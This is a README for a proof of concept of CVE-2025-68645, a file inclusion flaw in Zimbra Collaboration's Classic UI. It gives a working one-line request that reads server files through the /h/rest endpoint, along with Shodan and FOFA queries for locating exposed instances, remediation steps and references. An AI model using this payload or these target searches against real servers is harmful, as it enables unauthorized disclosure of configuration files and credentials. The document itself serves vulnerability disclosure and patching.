# zimbramail-CVE-2025-68645-poc

A proof-of-concept exploiting a Local File Inclusion (LFI) vulnerability existing in the Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1 because of improper handling of user-supplied request parameters in the RestFilter servlet.

# Vulnerability

The vulnerability exists due to improper input validation in the RestFilter servlet. An unauthenticated remote attacker can craft requests to the /h/rest endpoint to influence internal request dispatching, allowing inclusion of arbitrary files from the WebRoot directory.

-   User-controlled parameters are not correctly sanitized.
-   Internal request routing can be manipulated.
-   Arbitrary files under the WebRoot directory may be included in server responses.

# Affected Versions

-   Zimbra versions 10.0.x prior to 10.0.18
-   Zimbra versions 10.1.x prior to 10.1.13

# Poc (by sirifu4k1)

```
http://127.0.0.1/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml
```

# Automation

Nuclei-Template:

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-68645.yaml

# Into the wild

FOFA:

```
((title="Zimbra Web Client Sign In") || (title="Zimbra 网络客户端登录"))
```

SHODAN:

```
http.title:"Zimbra Web Client Sign In"
```

# Impact

An unauthenticated remote attackers can include arbitrary files from the WebRoot directory, potentially exposing sensitive information.

-   Read sensitive files (configs, environment data)
-   Leak credentials or internal paths
-   Gather intelligence for further exploitation
-   Chain with other vulnerabilities for deeper compromise

Vector 3.x
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
/ Base Score 3.x
8.80
/ Severity 3.x
HIGH

# Remediation & Mitigation

Update to the latest version of Zimbra Collaboration.

-   ZCS 10.0.18
-   ZCS 10.1.13 and later

Recommended Actions :

1. Upgrade immediately to a patched version
2. Disable Classic UI if not required
3. Monitor logs for suspicious access to `/h/rest`
4. Restrict public access to Zimbra web endpoints where possible
5. Review WebRoot permissions and exposed files

# References

https://nvd.nist.gov/vuln/detail/CVE-2025-68645

https://wiki.zimbra.com/wiki/Security_Center

https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy

https://x.com/sirifu4k1/status/2006031417088639064

# Disclaimer

This tool is for authorized security testing only. Unauthorized access to computer systems is illegal.